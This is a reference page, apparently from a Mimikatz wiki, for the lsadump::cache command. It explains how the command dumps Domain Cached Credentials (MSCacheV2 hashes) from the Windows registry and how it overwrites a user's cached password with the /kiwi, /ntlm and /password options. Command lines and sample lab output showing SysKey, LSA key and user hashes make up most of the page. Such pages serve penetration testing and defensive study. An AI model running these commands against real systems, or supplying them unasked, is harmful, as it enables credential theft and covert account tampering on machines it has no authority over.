cache
lsadump::cache can be used to enumerate Domain Cached Credentials from registry. It does so by acquiring the SysKey to decrypt NL$KM (binary protected value) and then MSCache(v1/v2).
The registry key for the Domain Cached Credentials is HKEY_LOCAL_MACHINE\SECURITY\Cache
The number of cached entries is defined in CachedLogonCount in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
It has the following command line arguments:
  • /sam: the SAM hive
  • /system: The SYSTEM hive
  • /security: The SECURITY hive
  • /user: An existing username to modify the cached credentials
  • /password: The new password of the specified user
  • /dcc: The MS-Cache hash to be replaced
  • /ntlm: The NTLM hash which will calculate the MS-Cache
  • /kiwi: Undocumented parameter which modifies the user's cached password to mimikatz
  • /subject: The subject's certificate name. This name must conform to the X.500 standard. The simplest method is to specify the name in double quotes, preceded by CN= (e.g. CN=myName) (more info).
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # lsadump::cache
2
Domain : WIN10
3
SysKey : 7e6804db6db0bbc15372ddf840962151
4
​
5
Local name : WIN10 ( S-1-5-21-1604892360-3618202543-1602915806 )
6
Domain name : hacklab ( S-1-5-21-2725560159-1428537199-2260736313 )
7
Domain FQDN : hacklab.local
8
​
9
Policy subsystem is : 1.18
10
LSA Key(s) : 1, default {9b57ea93-9de6-5d50-0497-034513ddc692}
11
[00] {9b57ea93-9de6-5d50-0497-034513ddc692} 62dd3714cc6d8e08f2c90bb18d949eb4e7fddb2478342640c5dc78a68d165e05
12
​
13
* Iteration is set to default (10240)
14
​
15
[NL$1 - 10/30/2021 8:53:10 PM]
16
RID : 000006c2 (1730)
17
User : hacklab\m3g9tr0n
18
MsCacheV2 : 7d3fb233bff87d75413d2c813df73fec
19
​
20
[NL$2 - 9/26/2021 2:46:02 PM]
21
RID : 000001f4 (500)
22
User : hacklab\Administrator
23
MsCacheV2 : fadb59e7f2f9a9bf6557ad4fa09e828f
24
​
25
[NL$3 - 10/18/2021 3:56:38 PM]
26
RID : 000006c4 (1732)
27
User : hacklab\optimus
28
MsCacheV2 : 98982877b0b57416d47a9a8f21331536
Copied!

Modify a DCC with /kiwi

1
mimikatz # lsadump::cache /user:hacklab\optimus /kiwi
2
> User cache replace mode !
3
* user : hacklab\optimus
4
* password : mimikatz <-------------------- Default Password
5
* ntlm : 60ba4fcadc466c7a033c178194c03df6
6
​
7
Domain : WIN10
8
SysKey : 7e6804db6db0bbc15372ddf840962151
9
​
10
Local name : WIN10 ( S-1-5-21-1604892360-3618202543-1602915806 )
11
Domain name : hacklab ( S-1-5-21-2725560159-1428537199-2260736313 )
12
Domain FQDN : hacklab.local
13
​
14
...Output Omitted...
Copied!
When changing the cached password for a user, all the related DPAPI data will be affected.

Modify a DCC with /ntlm

1
mimikatz # lsadump::cache /user:hacklab\optimus /ntlm:647d6f9b59c899c5fe4dad779522b8c5
2
> User cache replace mode !
3
* user : hacklab\optimus
4
* ntlm : 647d6f9b59c899c5fe4dad779522b8c5
5
​
6
Domain : WIN10
7
SysKey : 7e6804db6db0bbc15372ddf840962151
Copied!